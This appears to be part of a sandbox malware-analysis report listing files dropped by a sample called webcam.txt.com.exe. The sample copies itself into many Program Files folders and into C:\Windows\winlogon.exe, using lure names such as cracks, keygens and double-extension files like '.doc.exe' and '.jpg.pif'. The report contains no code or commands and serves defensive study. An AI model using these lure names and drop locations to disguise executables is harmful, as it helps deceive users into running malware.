Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\Norton Antivirus 2004.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Partitionsmagic 9.0.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\E-Book Archive.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Serials.txt.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Microsoft Office 2003 Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Lightwave SE Update.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\1000 Sex and more.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Magix Video Deluxe 4.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\How to hack.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\MS Service Pack 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\E-Book Archive.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Dictionary English - France.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Star Office 8.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Doom 3 Beta.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Lightwave SE Update.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Windows Sourcecode.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\Serials.txt.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Opera.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\3D Studio Max 3dsmax.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Gimp 1.5 Full with Key.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Clone DVD 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\The Sims 3 crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Lightwave SE Update.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Magix Video Deluxe 4.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\1000 Sex and more.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\IE58.1 full setup.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Lightwave SE Update.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\WinAmp 12 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Partitionsmagic 9.0.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Serials.txt.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\XXX hardcore pic.jpg.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Visual Studio Net Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\The Sims 3 crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Keygen 4 all appz.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\IE58.1 full setup.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Visual Studio Net Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Doom 3 Beta.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\The Sims 3 crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\XXX hardcore pic.jpg.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Help\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\How to hack.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Learn Programming.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Win Longhorn Beta.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Keygen 4 all appz.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft WinXP Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\How to hack.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Win Longhorn Beta.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\How to hack.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Microsoft WinXP Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\Ahead Nero 7.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Microsoft WinXP Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\How to hack.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Star Office 8.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Microsoft Office 2003 Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Learn Programming.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\IE58.1 full setup.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Partitionsmagic 9.0.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Opera.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\The Sims 3 crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Adobe Photoshop 9 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Visual Studio Net Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Windows Sourcecode.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\MS Service Pack 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\XXX hardcore pic.jpg.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\MS Service Pack 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\How to hack.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\ACDSee 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\XXX hardcore pic.jpg.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Learn Programming.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\The Sims 3 crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Adobe Photoshop 9 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Ulead Keygen.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Dictionary English - France.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\E-Book Archive.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\RFC Basics Full Edition.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Magix Video Deluxe 4.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\RFC Basics Full Edition.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Microsoft WinXP Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Partitionsmagic 9.0.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Star Office 8.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Microsoft WinXP Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\WinAmp 12 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Smashing the stack.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\Keygen 4 all appz.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Norton Antivirus 2004.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Clone DVD 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Windows\winlogon.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\DivX 7.0 final.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Gimp 1.5 Full with Key.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Dictionary English - France.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\IE58.1 full setup.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\How to hack.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\MS Service Pack 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Microsoft Office 2003 Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\The Sims 3 crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\RFC Basics Full Edition.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Serials.txt.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Star Office 8.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Adobe Premiere 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Keygen 4 all appz.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\1000 Sex and more.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Ahead Nero 7.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\WinAmp 12 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\3D Studio Max 3dsmax.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\1000 Sex and more.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\ACDSee 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Serials.txt.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Gimp 1.5 Full with Key.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\How to hack.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\1000 Sex and more.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Smashing the stack.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\Microsoft WinXP Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Keygen 4 all appz.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Serials.txt.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Adobe Premiere 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Ulead Keygen.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Ulead Keygen.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Lightwave SE Update.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\XXX hardcore pic.jpg.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Microsoft Office 2003 Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Ahead Nero 7.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Clone DVD 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Adobe Premiere 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\IE58.1 full setup.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Win Longhorn Beta.exeJump to dropped file
